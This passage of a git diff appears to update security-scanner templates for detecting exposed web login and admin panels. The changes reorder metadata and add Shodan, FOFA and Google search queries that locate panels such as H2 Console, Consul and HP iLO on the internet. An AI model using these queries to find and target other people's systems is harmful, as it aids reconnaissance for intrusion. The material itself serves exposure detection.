+9,9 @@ info: reference: - https://graylog.org/ metadata: + verified: true max-request: 1 shodan-query: http.title:"Graylog Web Interface" - verified: true tags: panel,graylog,login,detect http: diff --git a/http/exposed-panels/greenbone-panel.yaml b/http/exposed-panels/greenbone-panel.yaml index d3ed86ef59..3ff6442573 100644 --- a/http/exposed-panels/greenbone-panel.yaml +++ b/http/exposed-panels/greenbone-panel.yaml @@ -9,12 +9,18 @@ info: classification: cpe: cpe:2.3:a:greenbone:greenbone_security_assistant:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: greenbone_security_assistant - shodan-query: http.title:"Greenbone Security Assistant" - vendor: greenbone verified: true - zoomeye-query: title:"Greenbone Security Assistant" + max-request: 1 + vendor: greenbone + product: greenbone_security_assistant + shodan-query: + - http.title:"Greenbone Security Assistant" + - http.title:"greenbone security assistant" + zoomeye-query: + - title:"Greenbone Security Assistant" + - title:"greenbone security assistant" + fofa-query: title="greenbone security assistant" + google-query: intitle:"greenbone security assistant" tags: panel,greenbone,login http: diff --git a/http/exposed-panels/group-ib-panel.yaml b/http/exposed-panels/group-ib-panel.yaml index 88907a7d51..c20607adcb 100644 --- a/http/exposed-panels/group-ib-panel.yaml +++ b/http/exposed-panels/group-ib-panel.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"Group-IB Managed XDR" - verified: true tags: panel,groupib http: diff --git a/http/exposed-panels/gyra-master-admin.yaml b/http/exposed-panels/gyra-master-admin.yaml index 560af553bf..74bbd52c27 100644 --- a/http/exposed-panels/gyra-master-admin.yaml +++ b/http/exposed-panels/gyra-master-admin.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"Login | GYRA Master Admin" - verified: true tags: panel,master,admin,gyra http: diff --git a/http/exposed-panels/h2console-panel.yaml b/http/exposed-panels/h2console-panel.yaml index d7293ec0a5..3d2f3a3965 100644 --- a/http/exposed-panels/h2console-panel.yaml +++ b/http/exposed-panels/h2console-panel.yaml @@ -14,9 +14,14 @@ info: cpe: cpe:2.3:a:h2database:h2:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: h2 - shodan-query: http.title:"H2 Console" vendor: h2database + product: h2 + shodan-query: + - http.title:"H2 Console" + - http.title:"h2 console" + - cpe:"cpe:2.3:a:h2database:h2" + fofa-query: title="h2 console" + google-query: intitle:"h2 console" tags: panel,h2,console,h2database http: diff --git a/http/exposed-panels/hadoop-exposure.yaml b/http/exposed-panels/hadoop-exposure.yaml index 11a10ec489..317ba47d7b 100644 --- a/http/exposed-panels/hadoop-exposure.yaml +++ b/http/exposed-panels/hadoop-exposure.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:apache:hadoop:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: hadoop vendor: apache + product: hadoop tags: panel,apache,hadoop http: diff --git a/http/exposed-panels/haivision-gateway-panel.yaml b/http/exposed-panels/haivision-gateway-panel.yaml index d66f51b2ab..4113712893 100644 --- a/http/exposed-panels/haivision-gateway-panel.yaml +++ b/http/exposed-panels/haivision-gateway-panel.yaml @@ -8,9 +8,9 @@ info: reference: - https://www.haivision.com/ metadata: + verified: true max-request: 1 shodan-query: http.title:"Haivision Gateway" - verified: true tags: panel,haivision,login,detect http: diff --git a/http/exposed-panels/haivision-media-platform-panel.yaml b/http/exposed-panels/haivision-media-platform-panel.yaml index 84496be21e..81ce258fcb 100644 --- a/http/exposed-panels/haivision-media-platform-panel.yaml +++ b/http/exposed-panels/haivision-media-platform-panel.yaml @@ -8,9 +8,9 @@ info: reference: - https://www.haivision.com/ metadata: + verified: true max-request: 1 shodan-query: http.title:"Haivision Media Platform" - verified: true tags: panel,haivision,login,detect http: diff --git a/http/exposed-panels/hangfire-dashboard.yaml b/http/exposed-panels/hangfire-dashboard.yaml index 638d0d263a..b5991988a1 100644 --- a/http/exposed-panels/hangfire-dashboard.yaml +++ b/http/exposed-panels/hangfire-dashboard.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:hangfire:hangfire:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: hangfire - shodan-query: title:"Overview – Hangfire Dashboard" - vendor: hangfire verified: true + max-request: 2 + vendor: hangfire + product: hangfire + shodan-query: + - title:"Overview – Hangfire Dashboard" + - http.title:"overview – hangfire dashboard" + fofa-query: title="overview – hangfire dashboard" + google-query: intitle:"overview – hangfire dashboard" tags: panel,hangfire http: diff --git a/http/exposed-panels/harbor-panel.yaml b/http/exposed-panels/harbor-panel.yaml index 7032e8eda7..805d54c476 100644 --- a/http/exposed-panels/harbor-panel.yaml +++ b/http/exposed-panels/harbor-panel.yaml @@ -12,11 +12,12 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:linuxfoundation:harbor:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 + vendor: linuxfoundation product: harbor shodan-query: http.favicon.hash:657337228 - vendor: linuxfoundation - verified: true + fofa-query: icon_hash=657337228 tags: panel,harbor,linuxfoundation http: diff --git a/http/exposed-panels/hashicorp-consul-agent.yaml b/http/exposed-panels/hashicorp-consul-agent.yaml index 67ace0f535..a010894875 100644 --- a/http/exposed-panels/hashicorp-consul-agent.yaml +++ b/http/exposed-panels/hashicorp-consul-agent.yaml @@ -11,8 +11,13 @@ info: cpe: cpe:2.3:a:hashicorp:consul:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: consul vendor: hashicorp + product: consul + shodan-query: + - http.title:"consul by hashicorp" + - cpe:"cpe:2.3:a:hashicorp:consul" + fofa-query: title="consul by hashicorp" + google-query: intitle:"consul by hashicorp" tags: tech,consul,api,panel,hashicorp http: diff --git a/http/exposed-panels/hashicorp-consul-webgui.yaml b/http/exposed-panels/hashicorp-consul-webgui.yaml index 8ec7e31d62..ff3167473f 100644 --- a/http/exposed-panels/hashicorp-consul-webgui.yaml +++ b/http/exposed-panels/hashicorp-consul-webgui.yaml @@ -11,9 +11,14 @@ info: cpe: cpe:2.3:a:hashicorp:consul:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: consul - shodan-query: http.title:"Consul by HashiCorp" vendor: hashicorp + product: consul + shodan-query: + - http.title:"Consul by HashiCorp" + - http.title:"consul by hashicorp" + - cpe:"cpe:2.3:a:hashicorp:consul" + fofa-query: title="consul by hashicorp" + google-query: intitle:"consul by hashicorp" tags: consul,webserver,panel,hashicorp http: diff --git a/http/exposed-panels/hestia-panel.yaml b/http/exposed-panels/hestia-panel.yaml index e175750dee..ef129b28de 100644 --- a/http/exposed-panels/hestia-panel.yaml +++ b/http/exposed-panels/hestia-panel.yaml @@ -12,11 +12,18 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:hestiacp:control_panel:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: control_panel - shodan-query: title:"Hestia Control Panel" - vendor: hestiacp verified: true + max-request: 1 + vendor: hestiacp + product: control_panel + shodan-query: + - title:"Hestia Control Panel" + - http.favicon.hash:-476299640 + - http.title:"hestia control panel" + fofa-query: + - icon_hash=-476299640 + - title="hestia control panel" + google-query: intitle:"hestia control panel" tags: panel,hestia,detect,hestiacp http: diff --git a/http/exposed-panels/highmail-admin-panel.yaml b/http/exposed-panels/highmail-admin-panel.yaml index 7339331159..572b5269e2 100644 --- a/http/exposed-panels/highmail-admin-panel.yaml +++ b/http/exposed-panels/highmail-admin-panel.yaml @@ -9,12 +9,17 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - fofa-query: title="HighMail" - max-request: 2 - product: high_cms - shodan-query: title:"HighMail" - vendor: aryanic verified: true + max-request: 2 + vendor: aryanic + product: high_cms + shodan-query: + - title:"HighMail" + - http.title:"highmail" + fofa-query: + - title="HighMail" + - title="highmail" + google-query: intitle:"highmail" tags: highmail,panel,aryanic http: diff --git a/http/exposed-panels/hivemanager-login-panel.yaml b/http/exposed-panels/hivemanager-login-panel.yaml index f499040a7b..a7768cb9ee 100644 --- a/http/exposed-panels/hivemanager-login-panel.yaml +++ b/http/exposed-panels/hivemanager-login-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.favicon.hash:1604363273 - verified: true tags: panel,hivemanager,aerohive http: diff --git a/http/exposed-panels/hmc-hybris-panel.yaml b/http/exposed-panels/hmc-hybris-panel.yaml index 55a61328fc..054d578380 100644 --- a/http/exposed-panels/hmc-hybris-panel.yaml +++ b/http/exposed-panels/hmc-hybris-panel.yaml @@ -11,8 +11,11 @@ info: cpe: cpe:2.3:a:sap:hybris:*:*:*:*:*:*:*:* metadata: max-request: 2 - product: hybris vendor: sap + product: hybris + shodan-query: http.title:"hybris" + fofa-query: title="hybris" + google-query: intitle:"hybris" tags: panel,sap http: diff --git a/http/exposed-panels/home-assistant-panel.yaml b/http/exposed-panels/home-assistant-panel.yaml index 918fe8826e..bf3ba86c32 100644 --- a/http/exposed-panels/home-assistant-panel.yaml +++ b/http/exposed-panels/home-assistant-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"Home Assistant" - verified: true tags: panel,iot,homeassistant http: diff --git a/http/exposed-panels/homebridge-panel.yaml b/http/exposed-panels/homebridge-panel.yaml index 436b05a6e9..33d2b5a2d2 100644 --- a/http/exposed-panels/homebridge-panel.yaml +++ b/http/exposed-panels/homebridge-panel.yaml @@ -10,9 +10,9 @@ info: - https://homebridge.io/ - https://github.com/homebridge metadata: + verified: true max-request: 1 shodan-query: title:"Homebridge" - verified: true tags: panel,homebridge,detect http: diff --git a/http/exposed-panels/homematic-panel.yaml b/http/exposed-panels/homematic-panel.yaml index f22258f2ff..38d2eb720c 100644 --- a/http/exposed-panels/homematic-panel.yaml +++ b/http/exposed-panels/homematic-panel.yaml @@ -11,9 +11,12 @@ info: cpe: cpe:2.3:o:eq-3:homematic_ccu3_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: homematic_ccu3_firmware - shodan-query: http.html:"Homematic" vendor: eq-3 + product: homematic_ccu3_firmware + shodan-query: + - http.html:"Homematic" + - http.html:"homematic" + fofa-query: body="homematic" tags: panel,homematic,iot,eq-3 http: diff --git a/http/exposed-panels/homer-panel.yaml b/http/exposed-panels/homer-panel.yaml index 6f52a2f2c2..fa28452b08 100644 --- a/http/exposed-panels/homer-panel.yaml +++ b/http/exposed-panels/homer-panel.yaml @@ -10,9 +10,9 @@ info: - https://github.com/bastienwirtz/homer - https://homer-demo.netlify.app/ metadata: + verified: true max-request: 1 shodan-query: http.favicon.hash:-417785140 - verified: true tags: panel,homer,detect,login http: diff --git a/http/exposed-panels/honeywell-xl-web-controller.yaml b/http/exposed-panels/honeywell-xl-web-controller.yaml index 6c8502736e..a8479afea4 100644 --- a/http/exposed-panels/honeywell-xl-web-controller.yaml +++ b/http/exposed-panels/honeywell-xl-web-controller.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"Honeywell XL Web Controller" - verified: true tags: panel,honeywell,edb http: diff --git a/http/exposed-panels/horde-login-panel.yaml b/http/exposed-panels/horde-login-panel.yaml index 90710f29b8..57b8e41b17 100644 --- a/http/exposed-panels/horde-login-panel.yaml +++ b/http/exposed-panels/horde-login-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: http.favicon.hash:-741491222 - verified: true tags: horde,panel http: diff --git a/http/exposed-panels/horde-webmail-login.yaml b/http/exposed-panels/horde-webmail-login.yaml index ada60681b0..853a9a7b2c 100644 --- a/http/exposed-panels/horde-webmail-login.yaml +++ b/http/exposed-panels/horde-webmail-login.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: http.favicon.hash:2104916232 - verified: true tags: horde,webmail,panel http: diff --git a/http/exposed-panels/hospital-management-panel.yaml b/http/exposed-panels/hospital-management-panel.yaml index b11d86c86d..d3ec143bac 100644 --- a/http/exposed-panels/hospital-management-panel.yaml +++ b/http/exposed-panels/hospital-management-panel.yaml @@ -10,11 +10,14 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:hospital_management_system_project:hospital_management_system:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: hospital_management_system - shodan-query: http.html:"Hospital Management System" - vendor: hospital_management_system_project verified: true + max-request: 1 + vendor: hospital_management_system_project + product: hospital_management_system + shodan-query: + - http.html:"Hospital Management System" + - http.html:"hospital management system" + fofa-query: body="hospital management system" tags: panel,hms,cms,hospital_management_system_project http: diff --git a/http/exposed-panels/hp-ilo-5.yaml b/http/exposed-panels/hp-ilo-5.yaml index c14ff4693c..cafaf9b473 100644 --- a/http/exposed-panels/hp-ilo-5.yaml +++ b/http/exposed-panels/hp-ilo-5.yaml @@ -13,8 +13,8 @@ info: cpe: cpe:2.3:h:hpe:integrated_lights-out_5:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: integrated_lights-out_5 vendor: hpe + product: integrated_lights-out_5 tags: hp,ilo,panel,hpe http: diff --git a/http/exposed-panels/hp-service-manager.yaml b/http/exposed-panels/hp-service-manager.yaml index 79a93c2f95..10bea7f586 100644 --- a/http/exposed-panels/hp-service-manager.yaml +++ b/http/exposed-panels/hp-service-manager.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:hp:service_manager:*:*:*:*:*:*:*:* metadata: max-request: 2 - product: service_manager - shodan-query: http.title:"HP Service Manager" vendor: hp + product: service_manager + shodan-query: + - http.title:"HP Service Manager" + - http.title:"hp service manager" + fofa-query: title="hp service manager" + google-query: intitle:"hp service manager" tags: panel,hp,service http: diff --git a/http/exposed-panels/hybris-administration-console.yaml b/http/exposed-panels/hybris-administration-console.yaml index f1d5fe80fc..9a0be035b9 100644 --- a/http/exposed-panels/hybris-administration-console.yaml +++ b/http/exposed-panels/hybris-administration-console.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:sap:hybris:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: hybris - shodan-query: title:"Hybris" - vendor: sap verified: true + max-request: 1 + vendor: sap + product: hybris + shodan-query: + - title:"Hybris" + - http.title:"hybris" + fofa-query: title="hybris" + google-query: intitle:"hybris" tags: panel,hybris,sap http: diff --git a/http/exposed-panels/hydra-dashboard.yaml b/http/exposed-panels/hydra-dashboard.yaml index 3bd3390591..26f5e51099 100644 --- a/http/exposed-panels/hydra-dashboard.yaml +++ b/http/exposed-panels/hydra-dashboard.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:hydra_project:hydra:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: hydra - shodan-query: title:"Hydra Router Dashboard" - vendor: hydra_project verified: true + max-request: 1 + vendor: hydra_project + product: hydra + shodan-query: + - title:"Hydra Router Dashboard" + - http.title:"hydra router dashboard" + fofa-query: title="hydra router dashboard" + google-query: intitle:"hydra router dashboard" tags: panel,exposure,hydra,hydra_project http: diff --git a/http/exposed-panels/hypertest-dashboard.yaml b/http/exposed-panels/hypertest-dashboard.yaml index a3347248a1..8be49d0851 100644 --- a/http/exposed-panels/hypertest-dashboard.yaml +++ b/http/exposed-panels/hypertest-dashboard.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"HyperTest" - verified: true tags: panel,exposure,hypertest http: diff --git a/http/exposed-panels/i-mscp-panel.yaml b/http/exposed-panels/i-mscp-panel.yaml index 4a876cbdb8..b3449ca29f 100644 --- a/http/exposed-panels/i-mscp-panel.yaml +++ b/http/exposed-panels/i-mscp-panel.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"i-MSCP - Multi Server Control Panel" - verified: true tags: panel,i-mscp,detect http: diff --git a/http/exposed-panels/ibm-openadmin-panel.yaml b/http/exposed-panels/ibm-openadmin-panel.yaml index 7f69841051..2e71dd8946 100644 --- a/http/exposed-panels/ibm-openadmin-panel.yaml +++ b/http/exposed-panels/ibm-openadmin-panel.yaml @@ -5,9 +5,9 @@ info: author: DhiyaneshDK severity: info metadata: + verified: "true" max-request: 1 shodan-query: http.favicon.hash:965982073 - verified: "true" tags: openadmin,login,panel http: diff --git a/http/exposed-panels/ibm/ibm-dcec-panel.yaml b/http/exposed-panels/ibm/ibm-dcec-panel.yaml index 96828144b3..959675e44b 100644 --- a/http/exposed-panels/ibm/ibm-dcec-panel.yaml +++ b/http/exposed-panels/ibm/ibm-dcec-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://www.ibm.com/docs/en/odm/8.5.1?topic=console-tutorial-getting-started-decision-center-enterprise metadata: + verified: true max-request: 1 shodan-query: html:"Decision Center Enterprise console" - verified: true tags: panel,ibm,login,detect,decision-center http: diff --git a/http/exposed-panels/ibm/ibm-decision-server-console.yaml b/http/exposed-panels/ibm/ibm-decision-server-console.yaml index 33817f5e93..e9d078e1d4 100644 --- a/http/exposed-panels/ibm/ibm-decision-server-console.yaml +++ b/http/exposed-panels/ibm/ibm-decision-server-console.yaml @@ -9,9 +9,9 @@ info: reference: - https://www.ibm.com/docs/en/odm/8.12.0?topic=overview-introducing-rule-execution-server metadata: + verified: true max-request: 1 shodan-query: title:"Rule Execution Server" - verified: true tags: panel,ibm,login,detect,decision-server http: diff --git a/http/exposed-panels/ibm/ibm-maximo-login.yaml b/http/exposed-panels/ibm/ibm-maximo-login.yaml index 177f699210..20cb13ad9a 100644 --- a/http/exposed-panels/ibm/ibm-maximo-login.yaml +++ b/http/exposed-panels/ibm/ibm-maximo-login.yaml @@ -12,11 +12,12 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:ibm:maximo_asset_management:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 + vendor: ibm product: maximo_asset_management shodan-query: http.favicon.hash:-399298961 - vendor: ibm - verified: true + fofa-query: icon_hash=-399298961 tags: maximo,panel,ibm http: diff --git a/http/exposed-panels/ibm/ibm-mqseries-web-console.yaml b/http/exposed-panels/ibm/ibm-mqseries-web-console.yaml index e64a34a971..b041159502 100644 --- a/http/exposed-panels/ibm/ibm-mqseries-web-console.yaml +++ b/http/exposed-panels/ibm/ibm-mqseries-web-console.yaml @@ -13,8 +13,8 @@ info: cpe: cpe:2.3:a:ibm:mq:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: mq vendor: ibm + product: mq tags: panel,ibm http: diff --git a/http/exposed-panels/ibm/ibm-note-login.yaml b/http/exposed-panels/ibm/ibm-note-login.yaml index c083983300..ba34bbf349 100644 --- a/http/exposed-panels/ibm/ibm-note-login.yaml +++ b/http/exposed-panels/ibm/ibm-note-login.yaml @@ -13,8 +13,8 @@ info: cpe: cpe:2.3:a:ibm:inotes:*:*:*:*:*:*:*:* metadata: max-request: 2 - product: inotes vendor: ibm + product: inotes tags: ibm,edb,panel http: diff --git a/http/exposed-panels/ibm/ibm-odm-panel.yaml b/http/exposed-panels/ibm/ibm-odm-panel.yaml index 117df78337..9ba7feee8d 100644 --- a/http/exposed-panels/ibm/ibm-odm-panel.yaml +++ b/http/exposed-panels/ibm/ibm-odm-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://www.ibm.com/docs/en/odm/8.12.0 metadata: - fofa-query: title="Decision Center | Business Console" - max-request: 1 verified: true + max-request: 1 + fofa-query: title="Decision Center | Business Console" tags: panel,ibm,login,detect,decision-center http: diff --git a/http/exposed-panels/ibm/ibm-security-access-manager.yaml b/http/exposed-panels/ibm/ibm-security-access-manager.yaml index c751cbec14..b4b94a9bf6 100644 --- a/http/exposed-panels/ibm/ibm-security-access-manager.yaml +++ b/http/exposed-panels/ibm/ibm-security-access-manager.yaml @@ -13,8 +13,8 @@ info: cpe: cpe:2.3:a:ibm:security_access_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: security_access_manager vendor: ibm + product: security_access_manager tags: panel,ibm http: diff --git a/http/exposed-panels/ibm/ibm-websphere-admin-panel.yaml b/http/exposed-panels/ibm/ibm-websphere-admin-panel.yaml index 5bc5d81de3..377403ebcc 100644 --- a/http/exposed-panels/ibm/ibm-websphere-admin-panel.yaml +++ b/http/exposed-panels/ibm/ibm-websphere-admin-panel.yaml @@ -12,11 +12,12 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:ibm:websphere_application_server:*:*:*:*:z\/os:*:*:* metadata: + verified: true max-request: 1 + vendor: ibm product: websphere_application_server shodan-query: http.favicon.hash:1337147129 - vendor: ibm - verified: true + fofa-query: icon_hash=1337147129 tags: websphere,panel,ibm http: diff --git a/http/exposed-panels/ibm/ibm-websphere-panel.yaml b/http/exposed-panels/ibm/ibm-websphere-panel.yaml index 0d6156006b..e70b6ff24a 100644 --- a/http/exposed-panels/ibm/ibm-websphere-panel.yaml +++ b/http/exposed-panels/ibm/ibm-websphere-panel.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:ibm:websphere_portal:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: websphere_portal - shodan-query: http.html:"IBM WebSphere Portal" vendor: ibm + product: websphere_portal + shodan-query: + - http.html:"IBM WebSphere Portal" + - http.html:"ibm websphere portal" + - cpe:"cpe:2.3:a:ibm:websphere_portal" + fofa-query: body="ibm websphere portal" tags: ibm,websphere,panel http: diff --git a/http/exposed-panels/icc-pro-login.yaml b/http/exposed-panels/icc-pro-login.yaml index 77c85504cc..c4db2e584e 100644 --- a/http/exposed-panels/icc-pro-login.yaml +++ b/http/exposed-panels/icc-pro-login.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"Login to ICC PRO system" - verified: true tags: panel,icc-pro,edb http: diff --git a/http/exposed-panels/icewarp-panel-detect.yaml b/http/exposed-panels/icewarp-panel-detect.yaml index ed973c706f..de27380f66 100644 --- a/http/exposed-panels/icewarp-panel-detect.yaml +++ b/http/exposed-panels/icewarp-panel-detect.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:icewarp:icewarp_server:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: icewarp_server - shodan-query: title:"icewarp" - vendor: icewarp verified: true + max-request: 1 + vendor: icewarp + product: icewarp_server + shodan-query: + - title:"icewarp" + - http.title:"icewarp" + fofa-query: title="icewarp" + google-query: intitle:"icewarp" tags: icewarp,panel http: diff --git a/http/exposed-panels/icinga-web-login.yaml b/http/exposed-panels/icinga-web-login.yaml index 0f66a0a299..607c07a846 100644 --- a/http/exposed-panels/icinga-web-login.yaml +++ b/http/exposed-panels/icinga-web-login.yaml @@ -11,9 +11,18 @@ info: cpe: cpe:2.3:a:icinga:icinga_web_2:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: icinga_web_2 - shodan-query: http.title:"Icinga Web 2 Login" vendor: icinga + product: icinga_web_2 + shodan-query: + - http.title:"Icinga Web 2 Login" + - http.title:"icinga" + - http.title:"icinga web 2 login" + fofa-query: + - title="icinga web 2 login" + - title="icinga" + google-query: + - intitle:"icinga web 2 login" + - intitle:"icinga" tags: panel,icinga http: diff --git a/http/exposed-panels/iclock-admin-panel.yaml b/http/exposed-panels/iclock-admin-panel.yaml index a2a177d802..7dbc42947c 100644 --- a/http/exposed-panels/iclock-admin-panel.yaml +++ b/http/exposed-panels/iclock-admin-panel.yaml @@ -8,9 +8,9 @@ info: classification: cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: html:"iClock Automatic" - verified: true tags: panel,iclock,login,admin http: diff --git a/http/exposed-panels/ictprotege-login-panel.yaml b/http/exposed-panels/ictprotege-login-panel.yaml index e511dfea5b..8306ddbe90 100644 --- a/http/exposed-panels/ictprotege-login-panel.yaml +++ b/http/exposed-panels/ictprotege-login-panel.yaml @@ -9,11 +9,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:o:ict:protege_wx_firmware:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: protege_wx_firmware - shodan-query: title:"ICT Protege WX®" - vendor: ict verified: true + max-request: 1 + vendor: ict + product: protege_wx_firmware + shodan-query: + - title:"ICT Protege WX®" + - http.title:"ict protege wx®" + fofa-query: title="ict protege wx®" + google-query: intitle:"ict protege wx®" tags: panel,ictprotege,ict http: diff --git a/http/exposed-panels/identity-services-engine.yaml b/http/exposed-panels/identity-services-engine.yaml index 7515087915..0717c418cf 100644 --- a/http/exposed-panels/identity-services-engine.yaml +++ b/http/exposed-panels/identity-services-engine.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:cisco:identity_services_engine:*:*:*:*:*:*:*:* metadata: max-request: 2 - product: identity_services_engine - shodan-query: http.title:"Identity Services Engine" vendor: cisco + product: identity_services_engine + shodan-query: + - http.title:"Identity Services Engine" + - http.title:"identity services engine" + fofa-query: title="identity services engine" + google-query: intitle:"identity services engine" tags: panel,cisco http: diff --git a/http/exposed-panels/ilch-admin-panel.yaml b/http/exposed-panels/ilch-admin-panel.yaml index 6d14559f55..8a4bf37643 100644 --- a/http/exposed-panels/ilch-admin-panel.yaml +++ b/http/exposed-panels/ilch-admin-panel.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:ilch:cms:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: cms - shodan-query: http.title:"Ilch" - vendor: ilch verified: true + max-request: 1 + vendor: ilch + product: cms + shodan-query: + - http.title:"Ilch" + - http.title:"ilch" + fofa-query: title="ilch" + google-query: intitle:"ilch" tags: panel,ilch,cms http: diff --git a/http/exposed-panels/ilias-panel.yaml b/http/exposed-panels/ilias-panel.yaml index 279a62451a..e3e363907e 100644 --- a/http/exposed-panels/ilias-panel.yaml +++ b/http/exposed-panels/ilias-panel.yaml @@ -10,11 +10,14 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:ilias:ilias:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: ilias - shodan-query: http.html:"ILIAS" - vendor: ilias verified: true + max-request: 2 + vendor: ilias + product: ilias + shodan-query: + - http.html:"ILIAS" + - http.html:"ilias" + fofa-query: body="ilias" tags: panel,ilias http: diff --git a/http/exposed-panels/immich-panel.yaml b/http/exposed-panels/immich-panel.yaml index d45707b487..c20599872b 100644 --- a/http/exposed-panels/immich-panel.yaml +++ b/http/exposed-panels/immich-panel.yaml @@ -10,9 +10,9 @@ info: - https://immich.app/ - https://github.com/immich-app/immich metadata: + verified: true max-request: 1 shodan-query: http.favicon.hash:-43504595 - verified: true tags: panel,immich,detect http: diff --git a/http/exposed-panels/incapptic-connect-panel.yaml b/http/exposed-panels/incapptic-connect-panel.yaml index 9aceccc8f0..93023cfc87 100644 --- a/http/exposed-panels/incapptic-connect-panel.yaml +++ b/http/exposed-panels/incapptic-connect-panel.yaml @@ -13,11 +13,15 @@ info: cpe: cpe:2.3:a:ivanti:incapptic_connect:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: ivanti product: incapptic_connect shodan-query: - http.title:"incapptic" - http.favicon.hash:-1067582922 - vendor: ivanti + fofa-query: + - icon_hash=-1067582922 + - title="incapptic" + google-query: intitle:"incapptic" tags: panel,ivanti,incapptic-connect http: diff --git a/http/exposed-panels/influxdb-panel.yaml b/http/exposed-panels/influxdb-panel.yaml index d80a7113fe..bd08d14dea 100644 --- a/http/exposed-panels/influxdb-panel.yaml +++ b/http/exposed-panels/influxdb-panel.yaml @@ -13,9 +13,14 @@ info: cpe: cpe:2.3:a:influxdata:influxdb:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: influxdb - shodan-query: http.title:"InfluxDB - Admin Interface" vendor: influxdata + product: influxdb + shodan-query: + - http.title:"InfluxDB - Admin Interface" + - http.title:"influxdb - admin interface" + - influxdb + fofa-query: title="influxdb - admin interface" + google-query: intitle:"influxdb - admin interface" tags: panel,influxdb,influxdata http: diff --git a/http/exposed-panels/intelbras-login.yaml b/http/exposed-panels/intelbras-login.yaml index 414f0b785f..91bb5b9671 100644 --- a/http/exposed-panels/intelbras-login.yaml +++ b/http/exposed-panels/intelbras-login.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - google-query: intitle:"Intelbras" "All Rights Reserved" -.com max-request: 1 shodan-query: http.title:"Intelbras" + google-query: intitle:"Intelbras" "All Rights Reserved" -.com tags: panel,edb http: diff --git a/http/exposed-panels/intelbras-panel.yaml 